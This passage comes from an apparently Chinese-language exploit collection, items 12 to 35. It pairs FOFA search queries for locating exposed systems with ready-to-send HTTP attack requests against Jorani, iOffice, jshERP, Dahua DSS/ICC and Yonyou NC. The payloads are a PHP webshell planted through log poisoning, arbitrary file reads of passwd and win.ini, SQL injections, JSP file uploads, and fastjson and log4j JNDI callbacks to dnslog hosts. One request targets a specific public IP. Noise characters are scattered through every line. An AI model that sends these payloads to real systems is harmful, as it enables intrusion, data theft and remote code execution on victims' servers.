( N( W" n L' m3 w6 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
! B, K( x7 A% j+ m- \5 K. E. |# XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) ~; O B$ }) VAccept-Encoding: gzip, deflate
* B; s8 t* u: v+ P6 t- sAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
0 ]+ w; Z8 v3 ?7 ]9 EConnection: close# u+ y" H, ~0 L6 v+ G
0 U% _2 X5 X( ~! g7 s; _
+ F; i1 D. d; [# {4 m9 n/ r( K12. Jorani < 1.0.2 远程命令执行) Y6 {- t1 u2 ^- h/ ~% f e
FOFA:title="Jorani" C" m9 P0 R& d a, E$ U7 @/ H. `: x
第一步先拿到cookie
1 B( h6 R: ^* @6 Y1 TGET /session/login HTTP/1.1
6 z1 A+ {0 K$ zHost: 192.168.190.30
0 U5 k% @' n t( HUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36) N% p; T) n' @% Q% x) E' F
Connection: close
, N: y6 t+ r1 _0 B. H& E* X9 r8 tAccept-Encoding: gzip
! ~" @* J1 Y" N6 c3 }. ], |3 `6 q! x0 L. Y/ Y% B
& h2 f- W( A, E- u. K5 [$ U响应中csrf_cookie_jorani用于后续请求6 Y6 L9 C- H3 ]( r' i) z4 Z, W
HTTP/1.1 200 OK
1 l% ~: }( m9 b+ }Connection: close2 }7 Y4 u6 L% g6 Z/ D
Cache-Control: no-store, no-cache, must-revalidate3 A5 p! v9 o$ e* b( _/ A1 i1 h; g
Content-Type: text/html; charset=UTF-8
( e, U7 K4 {% S2 G! s+ V6 ]0 A# xDate: Tue, 24 Oct 2023 09:34:28 GMT; G8 m& l/ F' e& a
Expires: Thu, 19 Nov 1981 08:52:00 GMT
+ a; U: s& A9 yLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT1 [3 J2 Y# ^( E! ?; ]/ N5 d
Pragma: no-cache
. t7 L3 @4 H" l% u+ \Server: Apache/2.4.54 (Debian)- _1 u0 W4 Y* J: {- ^) `$ ?, |( I
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
& i& c' V( O/ TSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
3 I" S) m2 a! w2 G% pVary: Accept-Encoding" @ N9 O/ [! h8 D' V
3 U3 Q P. l( \) b4 `
- ]3 m, c) |) x$ r" YPOST请求,执行函数并进行base64编码
: i" F5 z3 ~& }! U/ \! hPOST /session/login HTTP/1.1
; ^. v; j I+ z$ J# o5 z' dHost: 192.168.190.30: t; V# H* C& @9 H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.366 g! [# C1 o2 A" K9 e
Connection: close
: q, s9 i* f- H) xContent-Length: 252, R: T# ]1 D7 K1 K- J: m0 ~
Content-Type: application/x-www-form-urlencoded
. o: |. [/ E- g2 TCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
1 H! }$ w" r7 z% N, Y! x- rAccept-Encoding: gzip
: r8 U# u1 e5 ~2 b! w9 f
1 o8 n6 V; l m1 a( Dcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor' ~ M3 E3 ]! e4 z1 X
4 V" y" ~2 d; Q* d0 f
" P( U+ M+ c) W5 o- j
( J& x$ s( b( b( _0 _
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
3 i0 S D4 C" m ?" P& fGET /pages/view/log-2023-10-24 HTTP/1.16 K b) ]8 u+ E" q! u
Host: 192.168.190.30- R2 C4 |" @" X0 s* k. }* X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36) W1 {# ?* V3 C
Connection: close7 d$ V- T/ w. n2 d: l0 }
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r1 v" F" L3 F1 ~) E V/ s
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=, D! s8 k; T3 X: p0 k, c1 A" [: q
X-REQUESTED-WITH: XMLHttpRequest' `6 @9 C0 c& G J& H! g
Accept-Encoding: gzip$ g4 I1 m4 o9 t# ]+ ?, U
6 |' G+ W" t/ p
: V( B# d r( I! [& x6 q A13. 红帆iOffice ioFileDown任意文件读取: y. E" b* W/ ?6 h( I
FOFA:app="红帆-ioffice"# s4 Z9 X' N1 `: f
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
r' j$ T1 n, `. Z* a+ DHost: x.x.x.x K: S3 F8 h9 S; D1 f, f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.369 K S% `7 Q- ?6 W6 p
Connection: close6 j9 E. g6 U' J, @7 \4 Y5 |
Accept: */*
. v- Z7 U8 Y" dAccept-Encoding: gzip
3 F' Y7 F& M* e% E$ ?, D# }& L) c9 D% e
( s8 t$ n% S4 u5 k$ S
14. 华夏ERP(jshERP)敏感信息泄露
+ V2 d+ e/ w5 Q& PFOFA:body="jshERP-boot"1 {5 I7 n% H: `# Z, j" X/ U" g
泄露内容包括用户名密码
8 K, R$ E! o0 O' pGET /jshERP-boot/user/getAllList;.ico HTTP/1.1% r4 }: D2 E t; J& m1 t+ k$ g! B
Host: x.x.x.x
+ Z" F) ^0 b" r; o5 [7 X0 `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.366 E K0 A; v! I/ R* Z% h
Connection: close
J2 R1 b2 w$ w _9 M. D1 `Accept: */*6 x% c3 N9 q& R6 {. J" W
Accept-Language: en
: N* X- @4 j+ l9 ]5 [+ oAccept-Encoding: gzip4 C/ z6 N: R7 R0 _6 c) o
1 G. ~4 Z& b' ]1 Y4 M0 b
) H2 ^( Y5 t6 j& \" R15. 华夏ERP getAllList信息泄露* \& B( S! n; w* M1 q( |
CVE-2024-0490
: M/ V! F$ k! M1 l$ ~" sFOFA:body="jshERP-boot"
1 R l- p3 G% S7 S* D' ~, \% ^泄露内容包括用户名密码. F5 y1 f7 W* W4 L% h( a7 z
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
& j6 q+ `: L( n. T- W6 N3 C! eHost: 192.168.40.130:100
! q9 R& `; i( [% }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36$ ~% d% F. T! `* s9 m5 D
Connection: close
f( d8 D9 q" }Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
0 D* X, e* ~& t! Z( H1 n& yAccept-Language: en& R0 u8 z" x3 D
sec-ch-ua-platform: Windows
. m7 N3 G$ L' c3 q3 z+ ?Accept-Encoding: gzip
- H* J) f( R7 F
8 D1 n4 ~. I8 j! U& r" L$ j0 D4 k9 k1 r+ t+ T4 c
16. 红帆HFOffice医微云SQL注入
) }) s- r6 `, N8 y8 r% I/ XFOFA:title="HFOffice"8 Z2 C2 I" b9 p9 _, c: ?8 Y
poc中调用函数计算1234的md5值5 F1 P0 }7 S& _* F. O e5 z7 F9 s
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
; m, n' G1 B3 N0 ]Host: x.x.x.x) t ?; t# f5 }& R# E$ i3 {. q
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.369 [' x# N# T$ B Q/ {* a
Connection: close
7 `: b |- I' ]Accept: */*4 K( j9 s9 o7 u# J2 ]
Accept-Language: en- ?: Z( t; T. b0 G2 s
Accept-Encoding: gzip2 z' ~7 L3 t! v5 O: n4 l d1 q% {
# H- H7 p( y3 l: u7 v
* [9 s& n2 [( z( g2 E2 Y
17. 大华 DSS itcBulletin SQL 注入
/ Z" I+ F3 [0 m( H+ Z# f" BFOFA:app="dahua-DSS"
5 \0 s" `7 g! E+ dPOST /portal/services/itcBulletin?wsdl HTTP/1.1
% w7 t- v9 X' O% XHost: x.x.x.x
" W' Y4 }8 }7 W/ m1 j9 Q9 HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 @7 l# a3 P' O+ m2 ?6 m& _Connection: close6 o, L" I$ P3 x- ]) W+ S, ?$ W( Y6 E
Content-Length: 345
3 d1 z& c$ i+ \9 HAccept-Encoding: gzip% l' o: O; z' z) P+ U0 g
0 f8 _8 d& o5 y2 N# S<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
6 x5 _% b5 c' z. D<s11:Body>
: g C$ T+ @5 a$ o3 G) Y+ W <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>. x: A4 [0 j c# ^2 Y* N$ ^9 o' U
<netMarkings>- x6 V, u* h/ c8 {
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
3 _$ H, C3 {$ P% ]& B* S </netMarkings>
- M5 D& N. F8 J- y </ns1:deleteBulletin>
" Z1 ~: E! `& g8 m6 G& g- _; ? </s11:Body>5 b2 o2 L3 `4 C3 S
</s11:Envelope>
/ H6 P) M- Y2 V$ {) M8 s2 a- s( H* N f6 P, G" [# p
- i! i8 w4 b7 a' x! f+ W: g, F9 @* Q
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
3 H3 t/ g8 P% E* S" s1 o% p' kFOFA:app="dahua-DSS"8 {( f4 \. D* C; c3 r5 t
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.15 A+ `, \" b R4 }) c9 W. O5 B4 e
Host: your-ip5 t; {1 l. p7 c4 q5 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 A, x2 p6 ?! C i
Accept-Encoding: gzip, deflate
+ N7 J: n' C J/ sAccept: */*- Z8 x1 @9 N* o5 c
Connection: keep-alive$ m: F+ `5 e; J+ K+ q
7 ~( ]: n. S) B9 `. B* z
( a, Y: P4 D# t) y2 D! @5 i) Y% W5 m
: u9 x# v/ u: w0 X+ B, r: a$ L
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
. Z) m4 Z8 {' V) L/ V$ EFOFA:app="dahua-DSS"
: C& X6 U! O! Z' l) `9 qGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
$ F3 p8 y2 u5 F$ F. M' H& r: _$ yHost:9 d5 B% K/ z0 ^2 t8 _) f) |
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
; N9 W: i# a$ u3 k3 fAccept-Encoding: gzip, deflate. \- M9 J' p6 J' H
Accept: */*
, H ~5 v( U. x0 |/ vConnection: keep-alive* l+ l* z, Q6 E! A3 P4 _
9 m n ~: `/ s7 p
7 K0 ~( K4 A, C! r" d( \2 [1 T' M+ q20. 大华ICC智能物联综合管理平台任意文件读取9 @. s7 B7 q5 |2 r$ b3 {7 X! I
FOFA:body="*客户端会小于800*"
+ y- W' x, ?- A2 P" GGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.11 Q& [$ R/ f+ f$ e" ^
Host: x.x.x.x V Z! c$ h3 j( s6 n+ E9 n
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
* Y! q7 M) U6 v: s, kConnection: close- M( S' H' R* P
Accept: */*- x8 N' B4 b$ [$ `
Accept-Language: en$ r G( L T$ E* X
Accept-Encoding: gzip
, u# D& I/ \8 t# W1 T
0 a/ d0 K5 u2 }; L3 a$ @
) T. x( ~: R" Y21. 大华ICC智能物联综合管理平台random远程代码执行4 _5 J8 `6 T. V- b7 V
FOFA:icon_hash="-1935899595"- a1 y: D2 ]! r+ b/ o
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1+ n6 i, @ {6 Z0 r
Host: x.x.x.x
- I ^9 y7 y& \) R, BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ _2 M: G) L1 |
Content-Length: 161
. P" _' S% E0 M: i/ ]1 U. _ y: |. zAccept-Encoding: gzip, [# \0 Q/ \. S
Connection: close# z% U/ M# _' i9 q z! c- a
Content-Type: application/json;charset=utf-8 d( {$ @$ W' x1 P2 V
" L% }3 F( |- ?, E/ P0 C8 e& ~{/ u9 I3 Y/ Y3 Q
"a":{" Q3 b$ \6 c$ T2 |, y1 A
"@type":"com.alibaba.fastjson.JSONObject",6 X$ e3 x5 Y* j. ]
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}4 h5 z" I8 z/ a/ t
}""
0 i! g" Y" y! m}* o5 y! ]3 F, l9 R
" Y; B; H1 N6 b- g) x6 [
9 i4 p3 G# b* K1 a6 U6 L
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
7 z+ H2 @5 h* d4 AFOFA:icon_hash="-1935899595"+ ?, O5 j* t: V' U! E- j# I* r
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
# Y& u' E3 X8 q# hHost: your-ip* O! U& E0 x b! c0 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36$ ]5 |, } E+ v
Content-Type: application/json;charset=utf-8
7 Q0 p. C9 w4 A, q4 H5 F( m) g# [4 i1 g! e$ }
{$ b) S7 }6 e+ j( S$ a" c: U3 H
"loginName":"${jndi:ldap://dnslog}"" S7 Q2 L+ [7 Z" y, X/ m& Q
}
2 `" n. b. p# I* V4 Q. x. n H' n& U0 B3 L
& y1 {! y x; e' }* }' u
! z9 _+ d) U3 Z5 r2 z( l
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行- ~/ G/ s, f |& d+ ~+ K. w
FOFA:icon_hash="-1935899595"
, I2 C v) _" U7 BPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.13 ^% s7 l) ^9 [. a/ {* p9 H
Host: your-ip
. P9 d' i z3 bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 c: x4 l9 {. Q4 L) B2 I
Content-Type: application/json;charset=utf-8
# N7 v: ]: Q* t- Z: d, l! `Accept-Encoding: gzip
5 I6 i2 I# B: N' R+ `Connection: close \0 W4 {: Y/ X }
6 C' z$ d' F# M7 j6 ?: |* s% W
{
4 ]3 X9 e. k' U# v* ^2 H- ^7 ^ "a":{
' B$ G( W( A8 \/ M& J "@type":"com.alibaba.fastjson.JSONObject",7 R6 ~+ p& r! x% O
{"@type":"java.net.URL","val":"http://DNSLOG"}; h' l( d% w9 |2 ` O. H
}""
/ `6 V. M \ |0 O; P1 N% k/ y8 [- `}
5 e# T9 ~9 `# Y) A" ]( o3 T5 K- o1 r( q
. f8 r) I7 F: L$ j) O% P
24. 用友NC 6.5 accept.jsp任意文件上传: ~7 f9 L4 R$ w
FOFA:icon_hash="1085941792"
4 X# A0 f: n1 G3 ^: r: c* nPOST /aim/equipmap/accept.jsp HTTP/1.1
: z3 l8 X: L) t" ^$ `- P tHost: x.x.x.x
4 ^% S# p2 n m; Y! IUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.363 L7 i. q4 I" n1 R; \
Connection: close
: k1 a6 U& r0 FContent-Length: 449# J1 c* ?1 f; `7 K
Accept: */*
# o( {6 _$ ]# c$ { iAccept-Encoding: gzip, k' b6 l1 A5 C1 L7 n1 Q
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc" n/ b( ~, J! U# ~# O$ c: w* B8 V- t
, S% X) M0 x8 s6 h+ K
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc3 g8 o- v+ t! w
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
0 ]+ X: I. A8 g& D2 u W3 CContent-Type: text/plain* G1 @6 n+ O$ v7 x/ g# N& n% N' e
- m/ ]! z% E4 n; e9 `
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
0 n$ K0 p/ C+ }% c& H& |5 ~8 Z-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
9 H1 t/ c' U2 f, S4 x7 hContent-Disposition: form-data; name="fname"
$ l( I7 [( A$ x- W+ F' m) X" ^: E
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp! A G( W* A% W3 A6 R' q- F
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
0 G' U1 j( p. O" u I% ^$ e6 Z4 t
- @' H. B- ^' L# T# X' m' d( j( k
25. 用友NC registerServlet JNDI 远程代码执行
?2 P' I' b. x" e' QFOFA:app="用友-UFIDA-NC"7 }/ w- M* t; x
POST /portal/registerServlet HTTP/1.1 a; v' v: W! i- w8 B
Host: your-ip- H3 P0 L3 U4 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
% F4 L2 t, y @- ~- n; |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
, h* m" C/ x5 d8 C1 E% P3 B- UAccept-Encoding: gzip, deflate9 D4 j$ w. y+ w, j- Q" h9 \. [
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
9 |6 E0 q4 a$ b3 k3 JContent-Type: application/x-www-form-urlencoded
& K! a1 J" L1 y5 r8 v" ^# x8 [% J: f6 S
type=1&dsname=ldap://dnslog
! I0 Y8 u" T5 x# Y' r& Q9 _# F# H; a6 K! ?1 u5 I" p- }
- b6 i: n! M: v! B) i) k5 q2 t9 ~3 ]0 x8 f
26. 用友NC linkVoucher SQL注入
: y( }) g' ^% G+ T. r6 \FOFA:app="用友-UFIDA-NC"* Z4 [+ n( \* t
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
3 \" d5 G) F& D) oHost: your-ip) g: W+ s) t0 x( {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 C5 r7 B0 P' m7 E0 TContent-Type: application/x-www-form-urlencoded
: i$ l0 K- T/ ~: p. D. E8 cAccept-Encoding: gzip, deflate
9 ], z/ E9 F# X8 tAccept: */*
$ ~- A8 l: m7 [! sConnection: keep-alive. D4 _) x1 h G8 a$ E5 u( s, g9 P( G) S
: z9 Y6 ~' F; u% y: ^5 W }- B% \( V" E+ @( d
27. 用友 NC showcontent SQL注入( c9 l4 K6 x* p5 ^. e
FOFA:icon_hash="1085941792"
; t& a& S( }& AGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1/ T, ^8 A' a' Q* f
Host: your-ip
4 [' [9 K3 ]+ G5 N# K/ t& dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. d3 N2 l# \! j2 _8 T" g. A+ u3 tAccept-Encoding: identity8 E9 ?8 ^0 w5 j# G& j
Connection: close: W5 E7 _8 N$ v, h' V+ g
Content-Type: text/xml; charset=utf-8, D% b+ G9 e$ ~. Z4 ?2 L
& U5 s' E0 i4 h) V$ J8 {
' C. t! C7 K! A/ `5 a3 P28. 用友NC grouptemplet 任意文件上传
3 _; P8 x* \. X5 z) FFOFA:icon_hash="1085941792"
) l/ @8 V3 B2 J' h8 y. O( {POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1) i# v9 ~' L* P7 W
Host: x.x.x.x
, M% P- U0 G2 i: {1 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
* M+ n( {* j& B1 j' aConnection: close. M6 z$ I3 R6 N _
Content-Length: 268% F: I" h% E% Z5 y9 m. R& u% U
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk, z; H2 r- b( A5 z* s4 d
Accept-Encoding: gzip
9 k$ z+ O( _$ F: `' A: f! d ~3 M0 I" G& e# L7 s! o
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk( W4 l/ r3 p' e, r0 R# R5 D% T( a
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"" Q- }, q/ Y! T+ }' V
Content-Type: application/octet-stream6 ^7 [8 c# P( m; }
5 L* z$ W3 L" |1 ~
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>1 e" }5 J+ U. z+ A$ A2 e8 F9 }
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--! m- r' B0 [: t) R; f- \7 @4 `
* s' N9 b, B& K" f& v
- u* v6 N0 J# i+ @' B' c1 I9 p
/uapim/static/pages/nc/head.jsp( @" b' F* J ~
, c4 f: |0 b4 r0 S
29. 用友NC down/bill SQL注入
9 i# U$ m* D! R: V& o3 TFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"- X" _. D2 ?( d; q# c
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
9 `5 ~9 b" U( C1 N! lHost: your-ip% d$ a/ j3 S5 Z; J- `* y) Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, V9 Q" G/ v; QContent-Type: application/x-www-form-urlencoded
2 `' p' r1 U$ ~/ o; t/ sAccept-Encoding: gzip, deflate
% M' K1 {2 p/ e% A& DAccept: */*
( o7 F1 b" n, K, fConnection: keep-alive
( L9 H6 e2 V7 @( h' i: ?
" S( g. B$ r! m4 q- ]9 T4 D1 B: P, Q( u) u7 ~! y/ N4 F4 Y
30. 用友NC importPml SQL注入5 b0 m7 P: n6 B2 _
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
- F( _, _6 _+ H# @POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
4 }3 e" T/ {6 l Y, n6 W4 PHost: your-ip
0 a& a% j0 D, g9 @' g) _Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V4 T- m: x$ u! e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36' Z: U! V# y- I9 [! `/ a
Connection: close6 D6 B8 \5 P' F( F0 U5 D( Y4 u
# d- ]( C; B8 I6 a P------WebKitFormBoundaryH970hbttBhoCyj9V
( Y7 A$ @% R9 K: q: |) ]Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
: t d4 Q& ?5 _ [' Y; Y3 z. `Content-Type: image/jpeg6 s1 x& U- F* q* E* p$ H# u" P
------WebKitFormBoundaryH970hbttBhoCyj9V--
6 w3 ], L! W, j# N- ~. d: s
9 l. ^( I6 ~ N0 V" [. M3 Z9 F" i% A2 Y# _$ q# m/ R
31. 用友NC runStateServlet SQL注入
! C0 o! Y: n& a4 ~ A# Kversion<=6.53 U8 ~; v- \% {- l, y) n l% `) `
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
; b& E D( \1 l1 u0 h( BGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
: |0 S; M$ }' l% N$ } ~Host: host6 R/ C2 X# X" U8 ~, R) k. E1 _( X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+ _; t$ |+ X* ^Content-Type: application/x-www-form-urlencoded7 _( c% ^4 {. k0 c( C- `& b
" p# z( B; t" v! @( p# O7 i H( ^, ]% V
32. 用友NC complainbilldetail SQL注入 K" v; c3 l* s5 U
version= NC633、NC65
1 p6 o2 P9 q, g. A. b" vFOFA:app="用友-UFIDA-NC"
3 ]$ c- E6 G* |! ]; A" Y. jGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1" B; g! K' b- `/ `4 G7 m
Host: your-ip
( A5 v' R6 @/ fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 ^$ X# X9 T9 j3 i" d# {
Content-Type: application/x-www-form-urlencoded7 L3 P! I6 L: z' Q5 ?
Accept-Encoding: gzip, deflate! Z1 v2 J0 R$ e9 ?) I! f$ V
Accept: */*4 _! [. r; Z+ U* {/ K
Connection: keep-alive$ V5 G& R p" ]' `! a
( R" ]6 y. }8 ^2 j4 d1 V- h5 i) V1 y5 V0 U' ? c
33. 用友NC downTax/download SQL注入* L) D3 R3 Q& V
version:NC6.5FOFA:app="用友-UFIDA-NC"
2 @6 z0 I2 a* oGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
) O# h4 ?/ A) w$ t+ dHost: your-ip
! C$ d+ B" w2 q; S) AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ S! p" b: v1 H' a+ k: R. mContent-Type: application/x-www-form-urlencoded" H, N# m! J _- ^" J. `0 e1 G
Accept-Encoding: gzip, deflate3 K" w5 ]! Q8 X) y: [
Accept: */*
3 n0 f& u# h. \Connection: keep-alive2 w7 r" p/ ^# Q O) e9 f0 x
$ D$ U' U/ c1 q: f+ O' |; [5 e+ [/ ?' ~; \
34. 用友NC warningDetailInfo接口SQL注入' A0 Y, S& T7 e& J# |7 K4 c
FOFA:app="用友-UFIDA-NC"' A7 r& Q' d2 i# i; C$ ]
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
7 M7 |9 `: b0 O0 rHost: your-ip
. R. y# D a9 `! xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Z7 O- p& q7 u# u+ E' fContent-Type: application/x-www-form-urlencoded
- l# R! t* H0 N+ l9 f" Y) E; EAccept-Encoding: gzip, deflate
7 L( L: a: ]9 ]2 K# \- M( ?# HAccept: */*2 |6 V+ i7 B& r; J- q
Connection: keep-alive
2 l- z( C9 E) f! R, H8 N) p
, @( \2 i& Z& J" P `; Q# ^& r# `+ }' A4 x
35. 用友NC-Cloud importhttpscer任意文件上传; u* O0 ]$ G1 v: ~
FOFA:app="用友-NC-Cloud"/ J( I3 Y9 b4 j- z
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
7 ~* ]5 ?' T: ^Host: 203.25.218.166:8888+ P6 p1 U9 r4 u6 e
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
* V- r3 N. O; `% q/ F IAccept-Encoding: gzip, deflate, k) q3 ?4 X0 |/ a K7 }- T
Accept: */*
. A" T) l7 v$ A/ Y9 kConnection: close3 M( Q$ ^: r0 L r3 k% H* Y( b# M
